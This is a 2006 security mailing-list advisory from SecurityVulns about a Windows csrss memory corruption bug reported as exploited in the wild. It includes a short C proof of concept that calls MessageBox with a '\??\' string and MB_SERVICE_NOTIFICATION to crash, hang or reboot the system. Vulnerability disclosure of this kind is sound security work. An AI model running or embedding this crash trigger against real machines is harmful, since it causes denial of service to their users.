Computer Security


Related information

  Microsoft Windows memory corruption

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From: 3APA3A <3APA3A_(at)_security.nnov.ru>
Date: 16.12.2006
Subject: Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear [email protected],

 On one of the Russian forums, a security vulnerability is discussed in
 Microsoft Windows (Windows XP is tested). The vulnerability is caused by
 memory corruption if a string beginning with "\?\" is sent through the
 MessageBox API with the MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug" feature not cleaned out in the final release, and it seems to be
 exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void)
{
    int i;
    char bug1[] = "\\??\\XXXX";

    /* Pass the "\??\"-prefixed string as both text and caption, ten times. */
    for (i = 0; i < 10; i++) {
        MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    }
    return 0;
}

System hangs, crashes (BSOD) or reboots.
 

--
http://www.security.nnov.ru
        /\_/\
       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                   |/

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod